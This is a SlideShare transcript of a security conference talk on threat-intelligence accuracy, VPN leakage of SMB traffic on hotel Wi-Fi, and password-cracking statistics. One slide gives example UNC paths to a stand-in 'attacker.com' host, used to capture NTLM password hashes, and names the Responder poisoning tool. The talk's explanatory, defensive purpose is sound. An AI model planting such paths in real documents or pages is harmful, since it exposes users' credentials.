SlideShare a Scribd company logo
1 of 55
11/13/2019 1
T: +44 (0)1622 723400 | E: info@secdata.com | W: www.secdata.com
CONFUSING THE
MYTHS WITH SOME
FACTS
by Charl Van Der Walt
@charlvdwalt
11/13/2019 2
15% !?!
11/13/2019 3
11/13/2019 4
WHO’S ASKING THE QUESTIONS, FOR YOU?
A journey through our own data to question simple truths we take for
granted. In this presentation we will share the answers to selected questions
we’ve asked ourselves about our own data and explain how we went about
answering them and what they ultimately taught us. None of it is rocket
science and most of it is sadly unsurprising, but all of it is clean, sincere,
authentic and honest.
Security Data Science in its most juvenile form.
11/13/2019 5
SECTION 1
BACKGROUND
11/13/2019 6
http://www.centurylink.com/
business/enterprise/blog/thinkgig/3-
major-benefits-of-intelligence-led-security
we produce
Intelligence led security is the collection,
aggregation, correlation and analysis of both
internal and external data to understand
risks, identify threat actors, discover and
minimize attacks or losses already underway,
and understand and predict the methods and
actions of likely adversaries.
11/13/2019 7
A GOOD IDEA GETS COMODITISED
11/13/2019 8
How efficient is Threat Intelligence about
the behaviour of an IP in predicting future
behaviour by that same IP?
But does it work
?
11/13/2019 9
Precision.
𝑷 𝒄𝒐𝒓𝒓𝒆𝒄𝒕𝒍𝒚 𝒑𝒓𝒆𝒅𝒊𝒄𝒕𝒆𝒅 = 𝟏 𝒐𝒃𝒔𝒆𝒓𝒗𝒆𝒅 = 𝟏)
Given that a specific IP is given to be acting suspiciously
by a Threat Intelligence source, what is the probability
that the IP will be observed acting suspiciously again
later?
Threat
Intelligence Lab
Our T.I. petri dish
environment
Honeynet Lab
Our honeynet petri
dish environment
3.59%
14.73%
11/13/2019 10
TWITTER DATA
1
10
100
1000
10000
100000
1000000
10000000
100000000
Mark Elon Me
Mom
Sis
Dog
Goal: 27,398,100
@charlvdwalt
11/13/2019 11
SECTION 2
VIRTUALLY PRIVATE NETWORKS
11/13/2019 12
The curious incident of the outbound 445
IP address on the InternetTwo employees at a hotel
• Traffic send in the morning
within one hour of each
other
• Same hotel and same
complimentary Wi-Fi
• Just before the VPN
connected
11/13/2019 13
SMB Port 445
• Server Message Block (SMB) protocol
• Windows uses it to share files, printers and serial ports
• NTLM authentication is used
• Windows wants to make your life easy
• This can be used to steal NTLM challenge-response
password hashes from SMB clients
• Attackers can trick a target into connecting to their SMB
server
• UNC paths in websites, documents, phishing emails etc
• For example:
• attacker.comshare-namefile.txt
• file://///attacker.com/share/folder/file.txt
11/13/2019 14
Two important clues
Malware/Documents?
Phishing emails?
Watering hole attack?
11/13/2019 15
66.96.162.92, in the kitchen, with a knife
*.domain.com -> 66.96.102.92
11/13/2019 16
domain.com, in the lounge, with a candle stick
“Connection specific suffix can be configured manually in the interface
properties or distributed dynamically through DHCP IP address assignment of
DHCP option 15”
11/13/2019 17
‘Free Wifi’
keycdn.com
11/13/2019 18
11/13/2019 19
Responder is a LLMNR, NBT-NS and MDNS poisoner, with
built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication
server supporting NTLMv1/NTLMv2/LMv2, Extended
Security NTLMSSP and Basic HTTP authentication.“
11/13/2019 20
‘Free Wifi’
Corporate HQ
11/13/2019 21
How effective are modern VPN products
at protecting us against actual
contemporary threats?
But does it work
?
11/13/2019 22
11/13/2019 23
11/13/2019 24
‘Free Wifi’
Corporate HQ
X
X
11/13/2019 25
11/13/2019 26
11/13/2019 27
11/13/2019 28
11/13/2019 29
11/13/2019 30
11/13/2019 31
11/13/2019 32
11/13/2019 33
Lock down mode is designed to prohibit network communication
outside of the VPN Tunnel when the … client is attempting to
create a VPN connection to the … Connect Secure device.“
11/13/2019 34
11/13/2019 35
11/13/2019 36
11/13/2019 37
11/13/2019 38
11/13/2019 39
DNS Lookup
Encrypted Tunnel
Poisoned Lookup
11/13/2019 40
11/13/2019 41
11/13/2019 42
SECTION 3
THE PASSWORD PROBLEM
11/13/2019 43
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
AFRICA AUS UK US ZA
PASSWORDS CRACKED PER COUNTRY
80%
11/13/2019 44
0
50000
100000
150000
200000
250000
300000
350000
400000
450000
500000
1 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 34 36 38 40 42 45
• 88% of passwords cracked were
8 - 12 characters long.
• Enterprise users seem to be
choosing long passwords
• But length appears to have a
negligible impact on security
11/13/2019 45
PREDICTABLE FORMATS - 2018
11/13/2019 46
SECTION 4
MAKING IT RIGHT
11/13/2019 47
11/13/2019 48
11/13/2019 49
11/13/2019 50
Think Authentication
11/13/2019 51
• The desktop is the target
• Direct access to user data
• The desktop is the user
• Inherited privileges on other systems
• Easy access to domain credentials
• Direct access to user location, video and audio
• The desktop is a foothold
• Ideal location for lateral movement and pivoting
• Numerous channels for exfiltration
• Excessive event data makes monitoring hard
• The desktop is a soft target
• The desktop is a big target
• User behaviour creates complex human-
machine system
• Directly accessible from the Internet!
11/13/2019 52
11/13/2019 53
While most enterprises assume that the internal network is a safe environment in
which to expose corporate applications, Google’s experience has proven that this
faith is misplaced. Rather, one should assume that an internal network is as
fraught with danger as the public Internet and build enterprise applications based
upon this assumption.
11/13/2019 54
KNOW who You Are
KNOW your Footprint
KNOW your Threat Model
KNOW your Vulnerabilities
KNOW how you react under assault
KNOW that something happened
KNOW what happened
KNOW what you’re going to do next
11/13/2019 55
T: +44 (0)1622 723400 | E: info@secdata.com | W: www.secdata.com
THANK YOU
Questions?
@charlvdwalt

More Related Content

What's hot

Cybercrime in Nigeria - Technology and Society
Cybercrime in Nigeria - Technology and SocietyCybercrime in Nigeria - Technology and Society
Cybercrime in Nigeria - Technology and SocietyPELUMI APANTAKU
 
Internet of things, New Challenges in Cyber Crime
Internet of things, New Challenges in Cyber CrimeInternet of things, New Challenges in Cyber Crime
Internet of things, New Challenges in Cyber CrimeMurray Security Services
 
Creating cyber forensic readiness in your organisation
Creating cyber forensic readiness in your organisationCreating cyber forensic readiness in your organisation
Creating cyber forensic readiness in your organisationJacqueline Fick
 
Addressing Cyber Threats in The Banking Sector - Lt Col (R) Sazali Bin Sukardi
Addressing Cyber Threats in The Banking Sector - Lt Col (R) Sazali Bin SukardiAddressing Cyber Threats in The Banking Sector - Lt Col (R) Sazali Bin Sukardi
Addressing Cyber Threats in The Banking Sector - Lt Col (R) Sazali Bin SukardiKnowledge Group
 
Mobile Security: The 5 Questions Modern Organizations Are Asking
Mobile Security: The 5 Questions Modern Organizations Are AskingMobile Security: The 5 Questions Modern Organizations Are Asking
Mobile Security: The 5 Questions Modern Organizations Are AskingLookout
 
Using Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber SecurityUsing Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber SecurityStephen Cobb
 
The Realities and Challenges of Cyber Crime and Cyber Security in Africa
The Realities and Challenges of Cyber Crime and Cyber Security in AfricaThe Realities and Challenges of Cyber Crime and Cyber Security in Africa
The Realities and Challenges of Cyber Crime and Cyber Security in AfricaZsolt Nemeth
 
BYOD - Mobility - Protection: security partnering with business
BYOD - Mobility - Protection: security partnering with businessBYOD - Mobility - Protection: security partnering with business
BYOD - Mobility - Protection: security partnering with businessMike Brannon
 
Cybercrime Research Paper
Cybercrime Research PaperCybercrime Research Paper
Cybercrime Research PaperWhitney Bolton
 
Art Hathaway - Artificial Intelligence - Real Threat Prevention
Art Hathaway - Artificial Intelligence - Real Threat PreventionArt Hathaway - Artificial Intelligence - Real Threat Prevention
Art Hathaway - Artificial Intelligence - Real Threat Preventioncentralohioissa
 
Cyber crime-A burning issue of today's world
Cyber crime-A burning issue of today's worldCyber crime-A burning issue of today's world
Cyber crime-A burning issue of today's worldSOURAV CHANDRA
 
Cyber Crime
Cyber CrimeCyber Crime
Cyber CrimeDivithC
 
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataLaw Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataAccellis Technology Group
 

What's hot (20)

Cybercrime in Nigeria - Technology and Society
Cybercrime in Nigeria - Technology and SocietyCybercrime in Nigeria - Technology and Society
Cybercrime in Nigeria - Technology and Society
 
Internet of things, New Challenges in Cyber Crime
Internet of things, New Challenges in Cyber CrimeInternet of things, New Challenges in Cyber Crime
Internet of things, New Challenges in Cyber Crime
 
Cybercrime: Radically Rethinking the Global Threat
Cybercrime:  Radically Rethinking the Global ThreatCybercrime:  Radically Rethinking the Global Threat
Cybercrime: Radically Rethinking the Global Threat
 
Creating cyber forensic readiness in your organisation
Creating cyber forensic readiness in your organisationCreating cyber forensic readiness in your organisation
Creating cyber forensic readiness in your organisation
 
Addressing Cyber Threats in The Banking Sector - Lt Col (R) Sazali Bin Sukardi
Addressing Cyber Threats in The Banking Sector - Lt Col (R) Sazali Bin SukardiAddressing Cyber Threats in The Banking Sector - Lt Col (R) Sazali Bin Sukardi
Addressing Cyber Threats in The Banking Sector - Lt Col (R) Sazali Bin Sukardi
 
Mobile Security: The 5 Questions Modern Organizations Are Asking
Mobile Security: The 5 Questions Modern Organizations Are AskingMobile Security: The 5 Questions Modern Organizations Are Asking
Mobile Security: The 5 Questions Modern Organizations Are Asking
 
Using Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber SecurityUsing Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber Security
 
Mobile security article
Mobile security articleMobile security article
Mobile security article
 
The Realities and Challenges of Cyber Crime and Cyber Security in Africa
The Realities and Challenges of Cyber Crime and Cyber Security in AfricaThe Realities and Challenges of Cyber Crime and Cyber Security in Africa
The Realities and Challenges of Cyber Crime and Cyber Security in Africa
 
Cyber Threat Intel : Overview
Cyber Threat Intel : OverviewCyber Threat Intel : Overview
Cyber Threat Intel : Overview
 
BYOD - Mobility - Protection: security partnering with business
BYOD - Mobility - Protection: security partnering with businessBYOD - Mobility - Protection: security partnering with business
BYOD - Mobility - Protection: security partnering with business
 
Mobile security
Mobile securityMobile security
Mobile security
 
Cybercrime Research Paper
Cybercrime Research PaperCybercrime Research Paper
Cybercrime Research Paper
 
Art Hathaway - Artificial Intelligence - Real Threat Prevention
Art Hathaway - Artificial Intelligence - Real Threat PreventionArt Hathaway - Artificial Intelligence - Real Threat Prevention
Art Hathaway - Artificial Intelligence - Real Threat Prevention
 
Security Awareness Presentation Fall 2013
Security Awareness Presentation Fall 2013Security Awareness Presentation Fall 2013
Security Awareness Presentation Fall 2013
 
Cyber crime-A burning issue of today's world
Cyber crime-A burning issue of today's worldCyber crime-A burning issue of today's world
Cyber crime-A burning issue of today's world
 
Cyber Forensics & Challenges
Cyber Forensics & ChallengesCyber Forensics & Challenges
Cyber Forensics & Challenges
 
Cyber Crime
Cyber CrimeCyber Crime
Cyber Crime
 
A report on cyber Crime
A report on cyber CrimeA report on cyber Crime
A report on cyber Crime
 
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataLaw Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
 

Similar to Confusing the myths with some facts

Blackberry playbook – new challenges
Blackberry playbook – new challengesBlackberry playbook – new challenges
Blackberry playbook – new challengesYury Chemerkin
 
CYBER SECURITY SEMINAR.pptx
CYBER SECURITY SEMINAR.pptxCYBER SECURITY SEMINAR.pptx
CYBER SECURITY SEMINAR.pptxDCEISO580thACWW
 
What is the Future of SIEM?
What is the Future of SIEM? What is the Future of SIEM?
What is the Future of SIEM? Elasticsearch
 
Baking Security into the Company Culture (2017)
Baking Security into the Company Culture (2017) Baking Security into the Company Culture (2017)
Baking Security into the Company Culture (2017) Mike Kleviansky
 
Security in the News
Security in the NewsSecurity in the News
Security in the NewsJames Sutter
 
Humming Heads Presentation
Humming Heads PresentationHumming Heads Presentation
Humming Heads PresentationDansha
 
Blackberry playbook – new challenges
Blackberry playbook – new challengesBlackberry playbook – new challenges
Blackberry playbook – new challengesSTO STRATEGY
 
Spikes Security Isla Isolation
Spikes Security Isla IsolationSpikes Security Isla Isolation
Spikes Security Isla IsolationCybryx
 
Basic computer courses in Ambla Cantt! Batra Computer Centre
Basic  computer  courses in Ambla Cantt! Batra Computer CentreBasic  computer  courses in Ambla Cantt! Batra Computer Centre
Basic computer courses in Ambla Cantt! Batra Computer CentreSimran Grover
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks  - Ed Adams, President, Security InnovationWfh security risks  - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationPriyanka Aash
 
Introduce to internet2
Introduce to internet2 Introduce to internet2
Introduce to internet2 Hardini_HD
 
IDERA Live | Mitigating Data Risks from Cloud to Ground
IDERA Live | Mitigating Data Risks from Cloud to GroundIDERA Live | Mitigating Data Risks from Cloud to Ground
IDERA Live | Mitigating Data Risks from Cloud to GroundIDERA Software
 
Health 2 0 & ultrabook services
Health 2 0 & ultrabook servicesHealth 2 0 & ultrabook services
Health 2 0 & ultrabook servicesifa2012
 
chapter 4 2014 (1).pptx
chapter 4 2014 (1).pptxchapter 4 2014 (1).pptx
chapter 4 2014 (1).pptxFerasGhdora
 
Securing, Buying, and buying computers 4-H
Securing, Buying, and buying computers 4-HSecuring, Buying, and buying computers 4-H
Securing, Buying, and buying computers 4-Hjmoore55
 

Similar to Confusing the myths with some facts (20)

Blackberry playbook – new challenges
Blackberry playbook – new challengesBlackberry playbook – new challenges
Blackberry playbook – new challenges
 
Mobile security
Mobile securityMobile security
Mobile security
 
CYBER SECURITY SEMINAR.pptx
CYBER SECURITY SEMINAR.pptxCYBER SECURITY SEMINAR.pptx
CYBER SECURITY SEMINAR.pptx
 
What is the Future of SIEM?
What is the Future of SIEM? What is the Future of SIEM?
What is the Future of SIEM?
 
Seclud it polesc_sjuly7
Seclud it polesc_sjuly7Seclud it polesc_sjuly7
Seclud it polesc_sjuly7
 
Baking Security into the Company Culture (2017)
Baking Security into the Company Culture (2017) Baking Security into the Company Culture (2017)
Baking Security into the Company Culture (2017)
 
One of 2 protect your business
One of 2 protect your businessOne of 2 protect your business
One of 2 protect your business
 
Security in the News
Security in the NewsSecurity in the News
Security in the News
 
Humming Heads Presentation
Humming Heads PresentationHumming Heads Presentation
Humming Heads Presentation
 
Blackberry playbook – new challenges
Blackberry playbook – new challengesBlackberry playbook – new challenges
Blackberry playbook – new challenges
 
Spikes Security Isla Isolation
Spikes Security Isla IsolationSpikes Security Isla Isolation
Spikes Security Isla Isolation
 
Wireless security
Wireless securityWireless security
Wireless security
 
Basic computer courses in Ambla Cantt! Batra Computer Centre
Basic  computer  courses in Ambla Cantt! Batra Computer CentreBasic  computer  courses in Ambla Cantt! Batra Computer Centre
Basic computer courses in Ambla Cantt! Batra Computer Centre
 
001 ho basic computer
001 ho basic computer001 ho basic computer
001 ho basic computer
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks  - Ed Adams, President, Security InnovationWfh security risks  - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
 
Introduce to internet2
Introduce to internet2 Introduce to internet2
Introduce to internet2
 
IDERA Live | Mitigating Data Risks from Cloud to Ground
IDERA Live | Mitigating Data Risks from Cloud to GroundIDERA Live | Mitigating Data Risks from Cloud to Ground
IDERA Live | Mitigating Data Risks from Cloud to Ground
 
Health 2 0 & ultrabook services
Health 2 0 & ultrabook servicesHealth 2 0 & ultrabook services
Health 2 0 & ultrabook services
 
chapter 4 2014 (1).pptx
chapter 4 2014 (1).pptxchapter 4 2014 (1).pptx
chapter 4 2014 (1).pptx
 
Securing, Buying, and buying computers 4-H
Securing, Buying, and buying computers 4-HSecuring, Buying, and buying computers 4-H
Securing, Buying, and buying computers 4-H
 

More from Harry Gunns

How major changes to the IT landscape are leading to new approaches in security
How major changes to the IT landscape are leading to new approaches in securityHow major changes to the IT landscape are leading to new approaches in security
How major changes to the IT landscape are leading to new approaches in securityHarry Gunns
 
Weaponised Information - Geoff White
Weaponised Information - Geoff WhiteWeaponised Information - Geoff White
Weaponised Information - Geoff WhiteHarry Gunns
 
Not becoming the next cybersecurity headline is difficult, very difficult - S...
Not becoming the next cybersecurity headline is difficult, very difficult - S...Not becoming the next cybersecurity headline is difficult, very difficult - S...
Not becoming the next cybersecurity headline is difficult, very difficult - S...Harry Gunns
 
Worry free security breach - Gemalto
Worry free security breach - GemaltoWorry free security breach - Gemalto
Worry free security breach - GemaltoHarry Gunns
 
Understanding your own data - Varonis
Understanding your own data - VaronisUnderstanding your own data - Varonis
Understanding your own data - VaronisHarry Gunns
 
Smart security people - Dominic White - SensePost
Smart security people - Dominic White - SensePostSmart security people - Dominic White - SensePost
Smart security people - Dominic White - SensePostHarry Gunns
 
Security Debt - Charl van der Walt - SecureData
Security Debt - Charl van der Walt - SecureDataSecurity Debt - Charl van der Walt - SecureData
Security Debt - Charl van der Walt - SecureDataHarry Gunns
 
Pick a password, any password - Wicus Ross - SensePost
Pick a password, any password - Wicus Ross - SensePostPick a password, any password - Wicus Ross - SensePost
Pick a password, any password - Wicus Ross - SensePostHarry Gunns
 
Navigating the IT landscape - Thomas Meyer - IDC
Navigating the IT landscape - Thomas Meyer - IDCNavigating the IT landscape - Thomas Meyer - IDC
Navigating the IT landscape - Thomas Meyer - IDCHarry Gunns
 
Integrated Secure Networking - Fortinet
Integrated Secure Networking - FortinetIntegrated Secure Networking - Fortinet
Integrated Secure Networking - FortinetHarry Gunns
 
Hacking our chairmans inbox - Charl van der Walt - SensePost
Hacking our chairmans inbox - Charl van der Walt - SensePostHacking our chairmans inbox - Charl van der Walt - SensePost
Hacking our chairmans inbox - Charl van der Walt - SensePostHarry Gunns
 
End to End Security - Check Point
End to End Security - Check PointEnd to End Security - Check Point
End to End Security - Check PointHarry Gunns
 
Content is King - Symantec
Content is King - SymantecContent is King - Symantec
Content is King - SymantecHarry Gunns
 
Cloud Security Primer - F5 Networks
Cloud Security Primer - F5 NetworksCloud Security Primer - F5 Networks
Cloud Security Primer - F5 NetworksHarry Gunns
 
Application Framework - Palo Alto Networks
Application Framework - Palo Alto NetworksApplication Framework - Palo Alto Networks
Application Framework - Palo Alto NetworksHarry Gunns
 
AI & Machine Learning - Etienne Greeff - SecureData
AI & Machine Learning - Etienne Greeff - SecureDataAI & Machine Learning - Etienne Greeff - SecureData
AI & Machine Learning - Etienne Greeff - SecureDataHarry Gunns
 

More from Harry Gunns (16)

How major changes to the IT landscape are leading to new approaches in security
How major changes to the IT landscape are leading to new approaches in securityHow major changes to the IT landscape are leading to new approaches in security
How major changes to the IT landscape are leading to new approaches in security
 
Weaponised Information - Geoff White
Weaponised Information - Geoff WhiteWeaponised Information - Geoff White
Weaponised Information - Geoff White
 
Not becoming the next cybersecurity headline is difficult, very difficult - S...
Not becoming the next cybersecurity headline is difficult, very difficult - S...Not becoming the next cybersecurity headline is difficult, very difficult - S...
Not becoming the next cybersecurity headline is difficult, very difficult - S...
 
Worry free security breach - Gemalto
Worry free security breach - GemaltoWorry free security breach - Gemalto
Worry free security breach - Gemalto
 
Understanding your own data - Varonis
Understanding your own data - VaronisUnderstanding your own data - Varonis
Understanding your own data - Varonis
 
Smart security people - Dominic White - SensePost
Smart security people - Dominic White - SensePostSmart security people - Dominic White - SensePost
Smart security people - Dominic White - SensePost
 
Security Debt - Charl van der Walt - SecureData
Security Debt - Charl van der Walt - SecureDataSecurity Debt - Charl van der Walt - SecureData
Security Debt - Charl van der Walt - SecureData
 
Pick a password, any password - Wicus Ross - SensePost
Pick a password, any password - Wicus Ross - SensePostPick a password, any password - Wicus Ross - SensePost
Pick a password, any password - Wicus Ross - SensePost
 
Navigating the IT landscape - Thomas Meyer - IDC
Navigating the IT landscape - Thomas Meyer - IDCNavigating the IT landscape - Thomas Meyer - IDC
Navigating the IT landscape - Thomas Meyer - IDC
 
Integrated Secure Networking - Fortinet
Integrated Secure Networking - FortinetIntegrated Secure Networking - Fortinet
Integrated Secure Networking - Fortinet
 
Hacking our chairmans inbox - Charl van der Walt - SensePost
Hacking our chairmans inbox - Charl van der Walt - SensePostHacking our chairmans inbox - Charl van der Walt - SensePost
Hacking our chairmans inbox - Charl van der Walt - SensePost
 
End to End Security - Check Point
End to End Security - Check PointEnd to End Security - Check Point
End to End Security - Check Point
 
Content is King - Symantec
Content is King - SymantecContent is King - Symantec
Content is King - Symantec
 
Cloud Security Primer - F5 Networks
Cloud Security Primer - F5 NetworksCloud Security Primer - F5 Networks
Cloud Security Primer - F5 Networks
 
Application Framework - Palo Alto Networks
Application Framework - Palo Alto NetworksApplication Framework - Palo Alto Networks
Application Framework - Palo Alto Networks
 
AI & Machine Learning - Etienne Greeff - SecureData
AI & Machine Learning - Etienne Greeff - SecureDataAI & Machine Learning - Etienne Greeff - SecureData
AI & Machine Learning - Etienne Greeff - SecureData
 

Recently uploaded

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 

Recently uploaded (20)

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 

Confusing the myths with some facts

Editor's Notes

  1. To do my job I have a lot of data. Between two dedicated research units, one of the worlds acclaimed Attack & Penetration Testing teams, a Managed Vulnerability Scanning Service and a Managed SIEM Service that collects, stores and analyses millions of customer security logs a day, we have the unique privilege of being able to look deep into the data to understand where our customers are vulnerable, how they’re being attacked and where the attackers are being successful. But in truth we never really do that, do we? As an industry we’re much too busy shouting each other down, inventing new acronyms or designing logos for our branded vulnerabilities to earnestly test our dearly held preconceptions about the ‘truths’ in our space. A while back I was debating with my team whether we should inform customers about an iOS exploit we were tracking. There was a strong argument that the effort would be wasted because iOS is ‘automatically’ patched. Instead of just arguing about it, we decided to test. Three million User Agents, endless struggles with Hadoop, Drill, Python & Excel and untold hours on the web followed, but finally we had a result: Almost 80% of iOS iOS devices analysed are consistently patched to the latest levels, but almost 